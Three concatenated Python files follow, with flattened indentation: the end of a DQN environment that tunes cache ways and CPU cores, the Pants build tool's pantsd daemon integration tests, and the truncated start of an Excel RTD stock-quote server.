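    # then 0b100 + 0b100 - 1 = 0b111 -> '0x7'; ways=20 -> '0xfffff'.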
def updateWays(self):
os.system('sudo pqos -e "llc:1=%s;" > /dev/null' % self.formatForCAT(self.appCacheWays))
def takeAction(self, action):
if(action == 0):
if(self.appCacheWays < 20):
self.appCacheWays += 1
wayLogger.warn("Increasing ways to - %s %s" % (self.appCacheWays, round(time.time()) - self.startingTime))
self.updateWays()
else:
wayLogger.warn("Ignore - %s %s" % (self.appCacheWays, round(time.time()) - self.startingTime))
return -1
elif(action == 1):
if(self.appCacheWays > 3):
self.appCacheWays -= 1
wayLogger.warn("Decreasing ways to - %s %s" % (self.appCacheWays, round(time.time()) - self.startingTime))
self.updateWays()
else:
wayLogger.warn("Ignore - %s %s" % (self.appCacheWays, round(time.time()) - self.startingTime))
return -1
elif(action == 2):
if(len(self.cores) < 24):
coreLogger.warn("Increasing cores to - %s %s" % (len(self.cores) + 1, round(time.time()) - self.startingTime))
self.mapCores(1)
else:
coreLogger.warn("Ignore - %s %s" % (len(self.cores), round(time.time()) - self.startingTime))
return -1
elif(action == 3):
if(len(self.cores) > 3):
coreLogger.warn("Decreasing cores to - %s %s" % (len(self.cores) - 1, round(time.time()) - self.startingTime))
self.mapCores(-1)
return 0
else:
coreLogger.warn("Ignore - %s %s" % (len(self.cores), round(time.time()) - self.startingTime))
return -1
else:
wayLogger.warn("Maintaining - %s %s" % (self.appCacheWays, round(time.time()) - self.startingTime))
coreLogger.warn("Maintaining - %s %s" % (len(self.cores), round(time.time()) - self.startingTime))
return 0
def running_mean(self, x, N):
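# Sliding-window mean via cumulative sums: cumsum[N:] - cumsum[:-N] gives each
# window's sum in one vectorized pass.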
cumsum = np.cumsum(np.insert(x, 0, 0))
return (cumsum[N:] - cumsum[:-N]) / float(N)
def norm_data(self, cur_counter=None):
state_space = []
run_mean = []
for i in range(0, len(EVENTS)):
out = cur_counter[i]/(EVENT_MAX[i])
state_space.append(out)
self.deques[EVENTS[i]].append(out)
if len(self.deques['UNHALTED_CORE_CYCLES']) < self.window_size:
return np.array(state_space)
else:
for _, val in self.deques.items():
run_mean.append(self.running_mean(val, self.window_size)[0])
return np.array(run_mean)
def getState(self, before, after):
state = [0] * len(EVENTS)
for i in range(0,len(EVENTS)):
state[i] = after[i] - before[i]
normalized = self.norm_data(state)
stateLogger.info("State is : %s %s" % (list(normalized), round(time.time()) - self.startingTime))
normalized = np.append(normalized, [ len(self.cores)/24 , self.appCacheWays/20 ])
return list(normalized)
def getReward(self, ignoreAction = 0):
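# Cubic penalty (clamped at -50) when the 99th-percentile sojourn time misses the QoS
# target; otherwise reward frugal use of cache ways and cores. Ignored actions get a flat -10.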
global containerReward
while(len(containerReward['reward']) == 0):
time.sleep(0.01)
rewardLogger.info("Waiting on reward " +
str(round(time.time()) - self.startingTime))
containerReward['lock'].acquire()
sjrn99 = np.percentile(containerReward['reward'], 99)
qos = round(sjrn99/1e3)
containerReward['lock'].release()
sjrnLogger.info("99th percentile is : " + str(qos) + " " + str(round(time.time()) - self.startingTime))
qosTarget = 4000
if qos > qosTarget:
reward = max(-(qos/qosTarget)**3, -50)
else:
# reward = qos/qosTarget + (20/self.appCacheWays + 24/len(self.cores))*2
# reward = qosTarget/qos + (20/self.appCacheWays + 24/len(self.cores))*2
reward = qosTarget/qos + (20/self.appCacheWays) + (24/len(self.cores))
if ignoreAction != 0:
reward = -10
rewardLogger.info("Reward is : " + str(reward) + " " + str(round(time.time()) - self.startingTime))
return reward
def clearReward(self):
global containerReward
containerReward['lock'].acquire()
containerReward['reward'] = []
containerReward['lock'].release()
def step(self, action):
pmc_before = self.getPMC()
ignored_action = self.takeAction(action)
self.clearReward()
time.sleep(2)
pmc_after = self.getPMC()
state = self.getState(pmc_before, pmc_after)
reward = self.getReward(ignored_action)
return state, reward, 0, {}
def reset(self):
state = [0] * (len(EVENTS) + 2)
return state
def close(self):
return
if __name__ == "__main__":
dt = datetime.now().strftime("%m_%d_%H")
Path("./models/%s" % dt).mkdir(parents=True, exist_ok=True)
env = CustomEnv()
policy_kwargs = dict(act_fun=tf.nn.relu, layers=[512, 256, 128])
model = DQN("MlpPolicy", env, policy_kwargs=policy_kwargs, verbose=1,
train_freq=1,
prioritized_replay=True,
prioritized_replay_alpha=0.6, prioritized_replay_beta0=0.4, prioritized_replay_beta_iters=20000,
double_q=True,
learning_rate=0.0025, target_network_update_freq=150, learning_starts=750,
batch_size=64, buffer_size=1000000,
gamma=0.99, exploration_fraction=0.1, exploration_initial_eps=1, exploration_final_eps=0.01,
tensorboard_log="./logs/%s/" % dt, n_cpu_tf_sess=22
)
model.learn(total_timesteps=15000)
model.save("./models/%s/model.zip" % dt)
|
test_pantsd_integration.py
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import datetime
import itertools
import os
import re
import signal
import sys
import threading
import time
import unittest
from textwrap import dedent
from pants.util.contextutil import environment_as, temporary_dir, temporary_file
from pants.util.dirutil import rm_rf, safe_file_dump, safe_mkdir, safe_open, touch
from pants_test.pants_run_integration_test import read_pantsd_log
from pants_test.pantsd.pantsd_integration_test_base import PantsDaemonIntegrationTestBase
from pants_test.testutils.process_test_util import no_lingering_process_by_command
def launch_file_toucher(f):
"""Launch a loop to touch the given file, and return a function to call to stop and join it."""
if not os.path.isfile(f):
raise AssertionError('Refusing to touch a non-file.')
halt = threading.Event()
def file_toucher():
while not halt.isSet():
touch(f)
time.sleep(1)
thread = threading.Thread(target=file_toucher)
thread.daemon = True
thread.start()
def join():
halt.set()
thread.join(timeout=10)
return join
class TestPantsDaemonIntegration(PantsDaemonIntegrationTestBase):
def test_pantsd_compile(self):
with self.pantsd_successful_run_context('debug') as (pantsd_run, checker, _, _):
# This tests a deeper pantsd-based run by actually invoking a full compile.
pantsd_run(['compile', 'examples/src/scala/org/pantsbuild/example/hello/welcome'])
checker.assert_started()
@unittest.skip('Flaky as described in: https://github.com/pantsbuild/pants/issues/7573')
def test_pantsd_run(self):
extra_config = {
'GLOBAL': {
# Muddies the logs with warnings: once all of the warnings in the repository
# are fixed, this can be removed.
'glob_expansion_failure': 'ignore',
}
}
with self.pantsd_successful_run_context(
'debug',
extra_config=extra_config
) as (pantsd_run, checker, workdir, _):
pantsd_run(['list', '3rdparty:'])
checker.assert_started()
pantsd_run(['list', ':'])
checker.assert_running()
pantsd_run(['list', '::'])
checker.assert_running()
# And again using the cached BuildGraph.
pantsd_run(['list', '::'])
checker.assert_running()
# Assert there were no warnings or errors thrown in the pantsd log.
full_log = '\n'.join(read_pantsd_log(workdir))
for line in read_pantsd_log(workdir):
# Ignore deprecation warning emissions.
if 'DeprecationWarning' in line:
continue
# Check if the line begins with W or E to check if it is a warning or error line.
self.assertNotRegex(line, r'^[WE].*',
'error message detected in log:\n{}'.format(full_log))
def test_pantsd_broken_pipe(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
run = self.run_pants_with_workdir('help | head -1', workdir, pantsd_config, shell=True)
self.assertNotIn('broken pipe', run.stderr_data.lower())
checker.assert_started()
def test_pantsd_stacktrace_dump(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
pantsd_run(['-ldebug', 'help'])
checker.assert_started()
os.kill(checker.pid, signal.SIGUSR2)
# Wait for log flush.
time.sleep(2)
self.assertIn('Current thread 0x', '\n'.join(read_pantsd_log(workdir)))
def test_pantsd_pantsd_runner_doesnt_die_after_failed_run(self):
# Check for no stray pantsd processes.
with no_lingering_process_by_command('pantsd'):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
# Run target that throws an exception in pants.
self.assert_failure(
self.run_pants_with_workdir(
['bundle', 'testprojects/src/java/org/pantsbuild/testproject/bundle:missing-files'],
workdir,
pantsd_config)
)
checker.assert_started()
# Assert pantsd is in a good functional state.
self.assert_success(self.run_pants_with_workdir(['help'], workdir, pantsd_config))
checker.assert_running()
def test_pantsd_lifecycle_invalidation(self):
"""Runs pants commands with pantsd enabled, in a loop, alternating between options that
should invalidate pantsd and incur a restart, and then asserts pid consistency.
"""
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
variants = (
['debug', 'help'],
['info', 'help']
)
last_pid = None
for cmd in itertools.chain(*itertools.repeat(variants, 3)):
# Run with a CLI flag.
pantsd_run(['-l{}'.format(cmd[0]), cmd[1]])
next_pid = checker.assert_started()
if last_pid is not None:
self.assertNotEqual(last_pid, next_pid)
last_pid = next_pid
# Run with an env var.
pantsd_run(cmd[1:], {'GLOBAL': {'level': cmd[0]}})
checker.assert_running()
def test_pantsd_lifecycle_non_invalidation(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
variants = (
['-q', 'help'],
['--no-colors', 'help'],
['help']
)
last_pid = None
for cmd in itertools.chain(*itertools.repeat(variants, 3)):
# Run with a CLI flag.
pantsd_run(cmd)
next_pid = checker.assert_started()
if last_pid is not None:
self.assertEqual(last_pid, next_pid)
last_pid = next_pid
def test_pantsd_lifecycle_non_invalidation_on_config_string(self):
with temporary_dir() as dist_dir_root, temporary_dir() as config_dir:
config_files = [
os.path.abspath(os.path.join(config_dir, 'pants.ini.{}'.format(i))) for i in range(2)
]
for config_file in config_files:
print('writing {}'.format(config_file))
with open(config_file, 'w') as fh:
fh.write('[GLOBAL]\npants_distdir: {}\n'.format(os.path.join(dist_dir_root, 'v1')))
invalidating_config = os.path.join(config_dir, 'pants.ini.invalidates')
with open(invalidating_config, 'w') as fh:
fh.write('[GLOBAL]\npants_distdir: {}\n'.format(os.path.join(dist_dir_root, 'v2')))
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
variants = [['--pants-config-files={}'.format(f), 'help'] for f in config_files]
pantsd_pid = None
for cmd in itertools.chain(*itertools.repeat(variants, 2)):
pantsd_run(cmd)
if not pantsd_pid:
pantsd_pid = checker.assert_started()
else:
checker.assert_running()
pantsd_run(['--pants-config-files={}'.format(invalidating_config), 'help'])
self.assertNotEqual(pantsd_pid, checker.assert_started())
def test_pantsd_stray_runners(self):
# Allow env var overrides for local stress testing.
attempts = int(os.environ.get('PANTS_TEST_PANTSD_STRESS_ATTEMPTS', 20))
cmd = os.environ.get('PANTS_TEST_PANTSD_STRESS_CMD', 'help').split()
with no_lingering_process_by_command('pantsd'):
with self.pantsd_successful_run_context('debug') as (pantsd_run, checker, _, _):
pantsd_run(cmd)
checker.assert_started()
for _ in range(attempts):
pantsd_run(cmd)
checker.assert_running()
# The runner can sometimes exit more slowly than the thin client caller.
time.sleep(3)
def test_pantsd_aligned_output(self):
# Set for pytest output display.
self.maxDiff = None
cmds = [
['goals'],
['help'],
['targets'],
['roots']
]
non_daemon_runs = [self.run_pants(cmd) for cmd in cmds]
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
daemon_runs = [pantsd_run(cmd) for cmd in cmds]
checker.assert_started()
for cmd, run in zip(cmds, daemon_runs):
print("(cmd, run) = ({}, {}, {})".format(cmd, run.stdout_data, run.stderr_data))
self.assertNotEqual(run.stdout_data, '', 'Empty stdout for {}'.format(cmd))
for run_pairs in zip(non_daemon_runs, daemon_runs):
self.assertEqual(*(run.stdout_data for run in run_pairs))
@unittest.skip('Flaky as described in: https://github.com/pantsbuild/pants/issues/7622')
def test_pantsd_filesystem_invalidation(self):
"""Runs with pantsd enabled, in a loop, while another thread invalidates files."""
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
cmd = ['list', '::']
pantsd_run(cmd)
checker.assert_started()
# Launch a separate thread to poke files in 3rdparty.
join = launch_file_toucher('3rdparty/jvm/com/google/auto/value/BUILD')
# Repeatedly re-list 3rdparty while the file is being invalidated.
for _ in range(0, 16):
pantsd_run(cmd)
checker.assert_running()
join()
def test_pantsd_client_env_var_is_inherited_by_pantsd_runner_children(self):
EXPECTED_KEY = 'TEST_ENV_VAR_FOR_PANTSD_INTEGRATION_TEST'
EXPECTED_VALUE = '333'
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
# First, launch the daemon without any local env vars set.
pantsd_run(['help'])
checker.assert_started()
# Then, set an env var on the secondary call.
# We additionally set the `HERMETIC_ENV` env var to allow the integration test harness
# to pass this variable through.
env = {
EXPECTED_KEY: EXPECTED_VALUE,
'HERMETIC_ENV': EXPECTED_KEY,
}
with environment_as(**env):
result = pantsd_run(
['-q',
'run',
'testprojects/src/python/print_env',
'--',
EXPECTED_KEY]
)
checker.assert_running()
self.assertEqual(EXPECTED_VALUE, ''.join(result.stdout_data).strip())
def test_pantsd_launch_env_var_is_not_inherited_by_pantsd_runner_children(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
with environment_as(NO_LEAKS='33'):
self.assert_success(
self.run_pants_with_workdir(
['help'],
workdir,
pantsd_config)
)
checker.assert_started()
self.assert_failure(
self.run_pants_with_workdir(
['-q', 'run', 'testprojects/src/python/print_env', '--', 'NO_LEAKS'],
workdir,
pantsd_config
)
)
checker.assert_running()
def test_pantsd_touching_a_file_does_not_restart_daemon(self):
test_file = 'testprojects/src/python/print_env/main.py'
config = {'GLOBAL': {'pantsd_invalidation_globs': '["testprojects/src/python/print_env/*"]'}}
with self.pantsd_successful_run_context(extra_config=config) as (
pantsd_run, checker, workdir, _
):
pantsd_run(['help'])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
checker.assert_running()
touch(test_file)
# Permit ample time for the async file event to propagate in CI.
time.sleep(10)
checker.assert_running()
def test_pantsd_invalidation_file_tracking(self):
test_dir = 'testprojects/src/python/print_env'
config = {'GLOBAL': {'pantsd_invalidation_globs': '["%s/*"]' %(test_dir)}}
with self.pantsd_successful_run_context(extra_config=config) as (
pantsd_run, checker, workdir, _
):
pantsd_run(['help'])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
def full_pantsd_log():
return '\n'.join(read_pantsd_log(workdir))
# Check the logs.
self.assertRegex(full_pantsd_log(), r'watching invalidating files:.*{}'.format(test_dir))
checker.assert_running()
# Create a new file in test_dir
with temporary_file(suffix='.py', binary_mode=False, root_dir=test_dir) as temp_f:
temp_f.write("import that\n")
temp_f.close()
time.sleep(10)
checker.assert_stopped()
self.assertIn('saw file events covered by invalidation globs', full_pantsd_log())
def test_pantsd_invalidation_pants_ini_file(self):
# Test that pantsd notices removal of a temporary pants.ini passed via --pants-config-files.
tmp_pants_ini = os.path.abspath("testprojects/test_pants.ini")
# Create tmp_pants_ini file
with safe_open(tmp_pants_ini, 'w') as f:
f.write("[DEFAULT]\n")
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
pantsd_run(['--pants-config-files={}'.format(tmp_pants_ini), 'help'])
checker.assert_started()
time.sleep(5)
# Delete tmp_pants_ini
os.unlink(tmp_pants_ini)
time.sleep(10)
checker.assert_stopped()
def test_pantsd_pid_deleted(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, config):
pantsd_run(['help'])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
checker.assert_running()
os.unlink(os.path.join(config["GLOBAL"]["pants_subprocessdir"], "pantsd", "pid"))
# Permit ample time for the async file event to propagate in CI.
time.sleep(10)
checker.assert_stopped()
def test_pantsd_pid_change(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, config):
pantsd_run(['help'])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
checker.assert_running()
pidpath = os.path.join(config["GLOBAL"]["pants_subprocessdir"], "pantsd", "pid")
with open(pidpath, 'w') as f:
f.write('9')
# Permit ample time for the async file event to propagate in CI.
time.sleep(10)
checker.assert_stopped()
# Remove the pidfile so that the teardown script doesn't try to kill process 9.
os.unlink(pidpath)
@unittest.skipIf(sys.version_info[0] == 2,
reason='Memory usage increase fraction is ~0.52 under python 2 as described in '
'https://github.com/pantsbuild/pants/issues/7761.')
def test_pantsd_memory_usage(self):
"""Validates that after N runs, memory usage has increased by no more than X percent."""
number_of_runs = 10
max_memory_increase_fraction = 0.40 # TODO https://github.com/pantsbuild/pants/issues/7647
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, config):
cmd = ['filter', 'testprojects::']
self.assert_success(pantsd_run(cmd))
initial_memory_usage = checker.current_memory_usage()
for _ in range(number_of_runs):
self.assert_success(pantsd_run(cmd))
checker.assert_running()
final_memory_usage = checker.current_memory_usage()
self.assertTrue(
initial_memory_usage <= final_memory_usage,
"Memory usage inverted unexpectedly: {} > {}".format(
initial_memory_usage, final_memory_usage
)
)
increase_fraction = (float(final_memory_usage) / initial_memory_usage) - 1.0
self.assertTrue(
increase_fraction <= max_memory_increase_fraction,
"Memory usage increased more than expected: {} -> {}: {} actual increase (expected < {})".format(
initial_memory_usage, final_memory_usage, increase_fraction, max_memory_increase_fraction
)
)
def test_pantsd_invalidation_stale_sources(self):
test_path = 'tests/python/pants_test/daemon_correctness_test_0001'
test_build_file = os.path.join(test_path, 'BUILD')
test_src_file = os.path.join(test_path, 'some_file.py')
has_source_root_regex = r'"source_root": ".*/{}"'.format(test_path)
export_cmd = ['export', test_path]
try:
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
safe_mkdir(test_path, clean=True)
pantsd_run(['help'])
checker.assert_started()
safe_file_dump(test_build_file, "python_library(sources=globs('some_non_existent_file.py'))")
result = pantsd_run(export_cmd)
checker.assert_running()
self.assertNotRegex(result.stdout_data, has_source_root_regex)
safe_file_dump(test_build_file, "python_library(sources=globs('*.py'))")
result = pantsd_run(export_cmd)
checker.assert_running()
self.assertNotRegex(result.stdout_data, has_source_root_regex)
safe_file_dump(test_src_file, 'import this\n')
result = pantsd_run(export_cmd)
checker.assert_running()
self.assertRegex(result.stdout_data, has_source_root_regex)
finally:
rm_rf(test_path)
@unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654")
def test_pantsd_parse_exception_success(self):
# This test covers the case described in #6426, where a run that is failing fast due to an
# exception can race other completing work. We expect all runs to fail due to the error
# that has been introduced, but none of them should hang.
test_path = 'testprojects/3rdparty/this_is_definitely_not_a_valid_directory'
test_build_file = os.path.join(test_path, 'BUILD')
invalid_symbol = 'this_is_definitely_not_a_valid_symbol'
try:
safe_mkdir(test_path, clean=True)
safe_file_dump(test_build_file, "{}()".format(invalid_symbol))
for _ in range(3):
with self.pantsd_run_context(success=False) as (pantsd_run, checker, _, _):
result = pantsd_run(['list', 'testprojects::'])
checker.assert_started()
self.assertIn(invalid_symbol, result.stderr_data)
finally:
rm_rf(test_path)
@unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654")
def test_pantsd_multiple_parallel_runs(self):
with self.pantsd_test_context() as (workdir, config, checker):
file_to_make = os.path.join(workdir, 'some_magic_file')
waiter_handle = self.run_pants_with_workdir_without_waiting(
['run', 'testprojects/src/python/coordinated_runs:waiter', '--', file_to_make],
workdir,
config,
)
checker.assert_started()
checker.assert_pantsd_runner_started(waiter_handle.process.pid)
creator_handle = self.run_pants_with_workdir_without_waiting(
['run', 'testprojects/src/python/coordinated_runs:creator', '--', file_to_make],
workdir,
config,
)
self.assert_success(creator_handle.join())
self.assert_success(waiter_handle.join())
def _assert_pantsd_keyboardinterrupt_signal(self, signum, regexps=[], quit_timeout=None):
"""Send a signal to the thin pailgun client and observe the error messaging.
:param int signum: The signal to send.
:param regexps: Assert that all of these regexps match somewhere in stderr.
:type regexps: list of str
:param float quit_timeout: The duration of time to wait for the pailgun client to flush all of
its output and die after being killed.
"""
# TODO: This tests that pantsd processes actually die after the thin client receives the
# specified signal.
with self.pantsd_test_context() as (workdir, config, checker):
# Launch a run that will wait for a file to be created (but do not create that file).
file_to_make = os.path.join(workdir, 'some_magic_file')
if quit_timeout is not None:
timeout_args = ['--pantsd-pailgun-quit-timeout={}'.format(quit_timeout)]
else:
timeout_args = []
argv = timeout_args + [
'run', 'testprojects/src/python/coordinated_runs:waiter', '--', file_to_make
]
waiter_handle = self.run_pants_with_workdir_without_waiting(argv, workdir, config)
client_pid = waiter_handle.process.pid
checker.assert_started()
checker.assert_pantsd_runner_started(client_pid)
# Get all the pantsd processes while they're still around.
pantsd_runner_processes = checker.runner_process_context.current_processes()
# This should kill the pantsd processes through the RemotePantsRunner signal handler.
os.kill(client_pid, signum)
waiter_run = waiter_handle.join()
self.assert_failure(waiter_run)
for regexp in regexps:
self.assertRegex(waiter_run.stderr_data, regexp)
time.sleep(1)
for proc in pantsd_runner_processes:
# TODO: we could be checking the return codes of the subprocesses, but psutil is currently
# limited on non-Windows hosts -- see https://psutil.readthedocs.io/en/latest/#processes.
# The pantsd processes should be dead, and they should have exited with 1.
self.assertFalse(proc.is_running())
@unittest.skip('Flaky as described in: https://github.com/pantsbuild/pants/issues/7554')
def test_pantsd_sigterm(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGTERM,
regexps=[
'\\[INFO\\] Sending SIGTERM to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.',
re.escape("\nSignal {signum} (SIGTERM) was raised. Exiting with failure.\n"
.format(signum=signal.SIGTERM)),
"""
Interrupted by user:
Interrupted by user over pailgun client!
$"""
])
@unittest.skip('Flaky as described in: https://github.com/pantsbuild/pants/issues/7572')
def test_pantsd_sigquit(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGQUIT,
regexps=[
'\\[INFO\\] Sending SIGQUIT to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.',
re.escape("\nSignal {signum} (SIGQUIT) was raised. Exiting with failure.\n"
.format(signum=signal.SIGQUIT)),
"""
Interrupted by user:
Interrupted by user over pailgun client!
$"""])
@unittest.skip('Flaky as described in: https://github.com/pantsbuild/pants/issues/7547')
def test_pantsd_sigint(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGINT,
regexps=["""\
\\[INFO\\] Sending SIGINT to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.
Interrupted by user.
Interrupted by user:
Interrupted by user over pailgun client!
$"""])
@unittest.skip('Flaky as described in: https://github.com/pantsbuild/pants/issues/7457')
def test_signal_pailgun_stream_timeout(self):
# NB: The actual timestamp has the date and time at sub-second granularity. The date is just
# used here since that is known in advance in order to assert that the timestamp is well-formed.
today = datetime.date.today().isoformat()
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGINT,
regexps=["""\
\\[INFO\\] Sending SIGINT to pantsd with pid [0-9]+, waiting up to 0\\.01 seconds before sending SIGKILL\\.\\.\\.
Interrupted by user\\.
[^ ]* \\[WARN\\] timed out when attempting to gracefully shut down the remote client executing \
"'pantsd.*'"\\. sending SIGKILL to the remote client at pid: [0-9]+\\. message: iterating \
over bytes from nailgun timed out with timeout interval 0\\.01 starting at {today}T[^\n]+, \
overtime seconds: [^\n]+
Interrupted by user:
Interrupted by user over pailgun client!
"""
.format(today=re.escape(today))],
# NB: Make the timeout very small to ensure the warning message will reliably occur in CI!
quit_timeout=1e-6)
def test_sigint_kills_request_waiting_for_lock(self):
"""
Test that, when a pailgun request is blocked waiting for another one to end,
sending SIGINT to the blocked run will kill it.
Regression test for issue: #7920
"""
config = {'GLOBAL': {
'pantsd_timeout_when_multiple_invocations': -1,
'level': 'debug'
}}
with self.pantsd_test_context(extra_config=config) as (workdir, config, checker):
# Run a repl, so that any other run waiting to acquire the daemon lock waits forever.
first_run_handle = self.run_pants_with_workdir_without_waiting(
command=['repl', 'examples/src/python/example/hello::'],
workdir=workdir,
config=config
)
checker.assert_started()
checker.assert_running()
blocking_run_handle = self.run_pants_with_workdir_without_waiting(
command=['goals'],
workdir=workdir,
config=config
)
# Block until the second request is waiting for the lock.
blocked = True
while blocked:
log = '\n'.join(read_pantsd_log(workdir))
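# NB: the misspelling 'aquire' below is deliberate; it must match the daemon's log message verbatim.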
if "didn't aquire the lock on the first try, polling." in log:
blocked = False
# NB: The exact sleep interval doesn't matter for correctness; it just keeps this
# polling loop from busy-waiting.
time.sleep(0.1)
# Sends SIGINT to the run that is waiting.
blocking_run_client_pid = blocking_run_handle.process.pid
os.kill(blocking_run_client_pid, signal.SIGINT)
blocking_run_handle.join()
# Check that pantsd is still serving the other request.
checker.assert_running()
# Send exit() to the repl, and exit it.
result = first_run_handle.join(stdin_data='exit()')
self.assert_success(result)
checker.assert_running()
def test_pantsd_environment_scrubbing(self):
# This pair of JVM options causes the JVM to always crash, so the command will fail if the env
# isn't stripped.
with self.pantsd_successful_run_context(
extra_config={'compile.zinc': {'jvm_options': ['-Xmx1g']}},
extra_env={'_JAVA_OPTIONS': '-Xms2g'},
) as (pantsd_run, checker, workdir, _):
pantsd_run(['help'])
checker.assert_started()
result = pantsd_run(['compile', 'examples/src/java/org/pantsbuild/example/hello/simple'])
self.assert_success(result)
def test_pantsd_unicode_environment(self):
with self.pantsd_successful_run_context(
extra_env={'XXX': '¡'},
) as (pantsd_run, checker, workdir, _):
result = pantsd_run(['help'])
checker.assert_started()
self.assert_success(result)
def test_daemon_auto_shutdown_after_first_run(self):
config = {'GLOBAL': {'shutdown_pantsd_after_run': True}}
with self.pantsd_test_context(extra_config=config) as (workdir, config, checker):
wait_handle = self.run_pants_with_workdir_without_waiting(
['list'],
workdir,
config,
)
# TODO(#6574, #7330): We might have a new default timeout after these are resolved.
checker.assert_started(timeout=16)
pantsd_processes = checker.runner_process_context.current_processes()
pants_run = wait_handle.join()
self.assert_success(pants_run)
# Permit enough time for the process to terminate in CI
time.sleep(5)
for process in pantsd_processes:
self.assertFalse(process.is_running())
# This is a regression test for a bug where we would incorrectly detect a cycle if two targets swapped their
# dependency relationship (#7404).
def test_dependencies_swap(self):
template = dedent("""
python_library(
name = 'A',
source = 'A.py',
{a_deps}
)
python_library(
name = 'B',
source = 'B.py',
{b_deps}
)
""")
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
with temporary_dir('.') as directory:
safe_file_dump(os.path.join(directory, 'A.py'), mode='w')
safe_file_dump(os.path.join(directory, 'B.py'), mode='w')
if directory.startswith('./'):
directory = directory[2:]
def list_and_verify():
result = pantsd_run(['list', '{}:'.format(directory)])
checker.assert_started()
self.assert_success(result)
expected_targets = {'{}:{}'.format(directory, target) for target in ('A', 'B')}
self.assertEqual(expected_targets, set(result.stdout_data.strip().split('\n')))
with open(os.path.join(directory, 'BUILD'), 'w') as f:
f.write(template.format(a_deps='dependencies = [":B"],', b_deps=''))
list_and_verify()
with open(os.path.join(directory, 'BUILD'), 'w') as f:
f.write(template.format(a_deps='', b_deps='dependencies = [":A"],'))
list_and_verify()
def test_concurrent_overrides_pantsd(self):
"""
Tests that the --concurrent flag overrides the --enable-pantsd flag,
because we don't allow concurrent runs under pantsd.
"""
config = {'GLOBAL': {'concurrent': True, 'enable_pantsd': True}}
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(['goals'], workdir=workdir, config=config)
self.assert_success(pants_run)
# TODO migrate to pathlib when we cut 1.18.x
pantsd_log_location = os.path.join(workdir, 'pantsd', 'pantsd.log')
self.assertFalse(os.path.exists(pantsd_log_location))
|
td_rtd.py
|
"""Excel RTD (RealTimeData) Server sample for real-time stock quote.
"""
import excel_rtd as rtd
import tdapi as ta
from datetime import datetime
import threading
import pythoncom
import win32api
import win32com.client
from win32com.server.exception import COMException
import logging
import os
import time
import asyncio
import json
from typing import List
LOG_FILE_FOLDER = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'logs')
LOG_FILENAME = os.path.join(LOG_FILE_FOLDER, 'TD_{:%Y%m%d_%H%M%S}.log'.format(datetime.now()))
if not os.path.exists(LOG_FILE_FOLDER):
os.makedirs(LOG_FILE_FOLDER)
logging.basicConfig(
filename=LOG_FILENAME,
level=logging.ERROR,
format="%(asctime)s:%(levelname)s:%(message)s"
)
class TDServer(rtd.RTDServer):
_reg_clsid_ = '{E28CFA65-CC94-455E-BF49-DCBCEBD17154}'
_reg_progid_ = 'TD.RTD'
_reg_desc_ = "RTD server for realtime stock quote"
# other class attributes...
def __init__(self):
super(TDServer, self).__init__()
self.td_cli = ta.create_td_client()
self.start_conn_event = threading.Event()
self.async_loop = None
self.topics_by_key = {}
self.update_thread = threading.Thread(target=self.update_thread_handler)
self.shutdown = False
def OnServerStart(self):
logging.info("OnServerStart Begin")
self.update_thread.start()
while not self.async_loop:
time.sleep(0.1)
def OnServerTerminate(self):
logging.info("OnServerTerminate Begin")
self.shutdown = True
if self.td_cli:
self.td_cli.close()
self.td_cli = None
if not self.start_conn_event.is_set():
self.start_conn_event.set()
if not self.ready_to_send.is_set():
self.ready_to_send.set()
self.start_conn_event.clear()
self.ready_to_send.clear()
def _on_quote_received(self, quotes: List[ta.TDQuote]) -> None:
self.async_loop.call_soon_threadsafe(lambda: self.update_message_queue.put_nowait(quotes))
def update_thread_handler(self) -> None:
logging.info("update_thread_handler start")
try:
pythoncom.CoInitializeEx(pythoncom.COINIT_MULTITHREADED)
asyncio.set_event_loop_policy(asyncio.WindowsProactorEventLoopPolicy())
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
self.async_loop = loop
self.update_message_queue = asyncio.Queue(loop=self.async_loop)
self.send_message_queue = asyncio.Queue(loop=self.async_loop)
self.ready_to_send = asyncio.Event(loop=self.async_loop)
# Following call can cause deadlock if mainthread is not pumping Windows message.
self.SetCallbackThread()
update_msg_coro = self._update_msg_handler()
send_msg_coro = self._send_msg_handler()
loop.run_until_complete(asyncio.gather(update_msg_coro, send_msg_coro))
loop.close()
except Exception as e:
logging.error("update_thread_handler: {}".format(repr(e)))
finally:
pythoncom.CoUninitialize()
#
# _update_msg_handler coro
#
async def _update_msg_handler(self) -> None:
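# Wait for the first topic (start_conn_event is a threading.Event, so this blocks the whole
# loop until then), connect the TD client, then drain quote batches into the matching topics
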